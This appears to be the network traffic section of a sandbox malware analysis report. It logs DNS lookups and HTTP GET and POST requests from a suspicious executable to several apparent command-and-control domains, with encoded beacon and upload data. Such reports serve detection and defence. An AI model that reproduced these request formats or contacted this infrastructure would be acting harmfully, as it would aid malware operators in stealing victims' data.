                                              Jan 2, 2025 09:19:46.414627075 CET8049997199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:46.415335894 CET4999780192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:46.438271046 CET4999780192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:46.443063021 CET8049997199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:47.021203041 CET8049997199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:47.021409988 CET8049997199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:47.021501064 CET4999780192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:47.951749086 CET4999780192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:48.971878052 CET4999880192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:48.976861954 CET8049998199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:48.976968050 CET4999880192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:48.994499922 CET4999880192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:48.999399900 CET8049998199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:49.597086906 CET8049998199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:49.597114086 CET8049998199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:49.599572897 CET4999880192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:50.498631001 CET4999880192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:51.517183065 CET4999980192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:51.522209883 CET8049999199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:51.523441076 CET4999980192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:51.538448095 CET4999980192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:51.543267012 CET8049999199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:51.543438911 CET8049999199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:52.123641968 CET8049999199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:52.123680115 CET8049999199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:52.123867989 CET4999980192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:53.045515060 CET4999980192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:54.065381050 CET5000080192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:54.070384979 CET8050000199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:54.073515892 CET5000080192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:54.082953930 CET5000080192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:54.087739944 CET8050000199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:54.705404043 CET8050000199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:54.705452919 CET8050000199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:19:54.705543041 CET5000080192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:54.709630013 CET5000080192.168.2.6199.192.21.169
                                              Jan 2, 2025 09:19:54.714566946 CET8050000199.192.21.169192.168.2.6
                                              Jan 2, 2025 09:20:00.101639986 CET5000180192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:00.106511116 CET8050001154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:00.107671976 CET5000180192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:00.122782946 CET5000180192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:00.127619028 CET8050001154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:00.687302113 CET8050001154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:00.687386036 CET8050001154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:00.687438011 CET5000180192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:01.639512062 CET5000180192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:03.267477989 CET5000280192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:03.272380114 CET8050002154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:03.272458076 CET5000280192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:03.289849043 CET5000280192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:03.294647932 CET8050002154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:03.855519056 CET8050002154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:03.856894970 CET8050002154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:03.856960058 CET5000280192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:04.795389891 CET5000280192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:05.814443111 CET5000380192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:05.819386959 CET8050003154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:05.820101976 CET5000380192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:05.834670067 CET5000380192.168.2.6154.197.162.239
                                              Jan 2, 2025 09:20:05.839559078 CET8050003154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:05.839608908 CET8050003154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:06.418879032 CET8050003154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:06.418904066 CET8050003154.197.162.239192.168.2.6
                                              Jan 2, 2025 09:20:06.418999910 CET5000380192.168.2.6154.197.162.239

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 2, 2025 09:18:49.338639975 CET6143753192.168.2.61.1.1.1
                                              Jan 2, 2025 09:18:49.355423927 CET53614371.1.1.1192.168.2.6
                                              Jan 2, 2025 09:19:06.033515930 CET6001453192.168.2.61.1.1.1
                                              Jan 2, 2025 09:19:06.090034962 CET53600141.1.1.1192.168.2.6
                                              Jan 2, 2025 09:19:19.220901012 CET6360753192.168.2.61.1.1.1
                                              Jan 2, 2025 09:19:19.232606888 CET53636071.1.1.1192.168.2.6
                                              Jan 2, 2025 09:19:32.585033894 CET5056053192.168.2.61.1.1.1
                                              Jan 2, 2025 09:19:32.867584944 CET53505601.1.1.1192.168.2.6
                                              Jan 2, 2025 09:19:46.394889116 CET5943753192.168.2.61.1.1.1
                                              Jan 2, 2025 09:19:46.405934095 CET53594371.1.1.1192.168.2.6
                                              Jan 2, 2025 09:19:59.720882893 CET5434453192.168.2.61.1.1.1
                                              Jan 2, 2025 09:20:00.096242905 CET53543441.1.1.1192.168.2.6

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jan 2, 2025 09:18:49.338639975 CET192.168.2.61.1.1.10xe4adStandard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:06.033515930 CET192.168.2.61.1.1.10x8bd1Standard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:19.220901012 CET192.168.2.61.1.1.10xe2fdStandard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:32.585033894 CET192.168.2.61.1.1.10xdb9bStandard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:46.394889116 CET192.168.2.61.1.1.10x2216Standard query (0)www.lonfor.websiteA (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:59.720882893 CET192.168.2.61.1.1.10x5430Standard query (0)www.investshares.netA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jan 2, 2025 09:18:49.355423927 CET1.1.1.1192.168.2.60xe4adNo error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:06.090034962 CET1.1.1.1192.168.2.60x8bd1No error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                              Jan 2, 2025 09:19:06.090034962 CET1.1.1.1192.168.2.60x8bd1No error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:19.232606888 CET1.1.1.1192.168.2.60xe2fdNo error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:19.232606888 CET1.1.1.1192.168.2.60xe2fdNo error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:32.867584944 CET1.1.1.1192.168.2.60xdb9bNo error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                              Jan 2, 2025 09:19:32.867584944 CET1.1.1.1192.168.2.60xdb9bNo error (0)zcdn.8383dns.com154.21.203.24A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:32.867584944 CET1.1.1.1192.168.2.60xdb9bNo error (0)zcdn.8383dns.com154.21.203.200A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:32.867584944 CET1.1.1.1192.168.2.60xdb9bNo error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:32.867584944 CET1.1.1.1192.168.2.60xdb9bNo error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:19:46.405934095 CET1.1.1.1192.168.2.60x2216No error (0)www.lonfor.website199.192.21.169A (IP address)IN (0x0001)false
                                              Jan 2, 2025 09:20:00.096242905 CET1.1.1.1192.168.2.60x5430No error (0)www.investshares.net154.197.162.239A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.gayhxi.info
                                              • www.promocao.info
                                              • www.grimbo.boats
                                              • www.44756.pizza
                                              • www.lonfor.website
                                              • www.investshares.net

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.64998147.83.1.90803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:18:49.375595093 CET490OUTGET /k2i2/?AZhlI=2P00kRyHXnBDvT&58=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWgf0QosAiOAvVd+8Dka4oeApiw402Mgl8dYUz322qMWWIHFaw/E= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.gayhxi.info
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 2, 2025 09:18:50.967578888 CET139INHTTP/1.1 567 unknown
                                              Server: nginx/1.18.0
                                              Date: Thu, 02 Jan 2025 08:18:50 GMT
                                              Content-Length: 17
                                              Connection: close
                                              Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                              Data Ascii: Request too large


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.64998384.32.84.32803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:06.112780094 CET742OUTPOST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 207
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 64 66 4e 36 53 79 53 4c 66 43 35 54 61 31 39 71 51 64 58 7a 53 5a 56 52 4d 34 47 64 54 49 4e 72 54 49 2b 4f 52 48 6f 38 74 68 50
                                              Data Ascii: 58=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvdfN6SySLfC5Ta19qQdXzSZVRM4GdTINrTI+ORHo8thP


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.64998484.32.84.32803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:08.661808968 CET766OUTPOST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 231
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 35 58 52 4f 67 30 64 7a 49 6e 70 54 77 2b 63 47 4c 50 7a 5a 45 73 45 54 47 30 34 4b 67 45 4e 65 61 44 64 44 79 4b 2b 35 5a 31 4e 77 3d 3d
                                              Data Ascii: 58=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC5XROg0dzInpTw+cGLPzZEsETG04KgENeaDdDyK+5Z1Nw==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.64998684.32.84.32803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:11.209821939 CET1779OUTPOST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 1243
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 35 38 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 79 42 55 59 70 59 74 33 70 44 31 6a 70 59 42 50 4d 64 53 57 41 7a 77 68 78 47 62 58 43 37 36 35 63 69 46 6a 32 52 7a 6f 64 36 47 39 69 4d 65 45 36 5a 39 71 39 36 59 54 32 5a 49 6d 55 68 51 61 47 4f 33 6e 69 55 6b 30 6b 76 52 6e 6a 51 5a 76 70 33 2b 63 75 33 7a 4c 4c 73 7a 48 4c 75 6d 69 2f 70 49 4b 64 77 6f 33 45 52 35 47 36 64 56 37 2f 53 35 6b 34 79 52 70 42 74 32 50 67 33 37 2f 6f 4d 39 33 5a 7a 6c 41 69 37 53 6d 46 52 62 35 70 64 65 31 56 72 2f 47 69 6e 71 5a 4a 66 51 43 4c 4e 75 4e 46 [TRUNCATED]
                                              Data Ascii: 58=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd+yBUYpYt3pD1jpYBPMdSWAzwhxGbXC765ciFj2Rzod6G9iMeE6Z9q96YT2ZImUhQaGO3niUk0kvRnjQZvp3+cu3zLLszHLumi/pIKdwo3ER5G6dV7/S5k4yRpBt2Pg37/oM93ZzlAi7SmFRb5pde1Vr/GinqZJfQCLNuNFSIcdf816rTh3QUbGE0d+1We926tPl5pMAieu1ATh6VqUC2HPxsXc9xoN7cqzB7o96gcXFbr2IvQtKBIcCb7nBw2SjcbIHR5FJi897GEdyAfzDQn53Fub2v4a8RZb5exBMslAEbjYzezbpQ6F4PRbAMKCY4SPMhe61VebSB1iFUx/ESt9IWT7bx3lSfvQaacY77ax+Fku6hfBlwnuEue3zPxv9IyzEPu7nVGoZa5qi1wIp3IeXpt2FRhJXIdw+8AHbJ5mjHNFh2d4cgdW+r0o6D0xdqEax/eT6CqcvFuPUNdGDxvX052SHWirTJZHwTX5FU21ASc6PXIfINxqajzSE8vzBuYzFRj+uNZ8GJd5EDQJeeEoyY0D+AMxrVSaa9j/3NKDVrBiUrCyLhGcDq+kLv6R/l5qPCzsGVjE4TgrUNXa6FMPLsUTOS2L832APYOI7BkKjROnWSg2XK1HrXygq43xkfSp4FAbLihHcth8FCcji2Q3+VtXP7IcWXYdq9ZFteoENzxxaq/TpI958L3MGe62WFiYt5c4ZcQLJ4CFJGqO96t4+NRFlibEoFBXVE/XSk1sRy1B8y5mirqe+AKUwxN5sPjIsk1YTM3qx1SVyGcr5PNSBKQBRVYatGlVfedJK1mCAZTXDYngvTQJduOLwKf5FjQ5Muecv/ [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.64998784.32.84.32803052C:\Program Files (x86)\snEJIgTPegGsTsZyBYpprsBhjenSYfImDnELhyUam\YVdkpeLSDe.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 2, 2025 09:19:13.750494003 CET492OUTGET /zaz4/?58=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&AZhlI=2P00kRyHXnBDvT HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.promocao.info
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 2, 2025 09:19:14.208683968 CET1236INHTTP/1.1 200 OK
                                              Date: Thu, 02 Jan 2025 08:19:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 9973
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Server: hcdn
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 515fde271e6f7fe163c21342b03ce537-bos-edge4
                                              Expires: Thu, 02 Jan 2025 08:19:13 GMT
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                              Jan 2, 2025 09:19:14.208715916 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                              Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                              Jan 2, 2025 09:19:14.208728075 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                              Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                              Jan 2, 2025 09:19:14.208739996 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                              Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                              Jan 2, 2025 09:19:14.208754063 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                              Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                              Jan 2, 2025 09:19:14.208764076 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                              Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                              Jan 2, 2025 09:19:14.208770990 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                              Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                              Jan 2, 2025 09:19:14.208776951 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                              Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
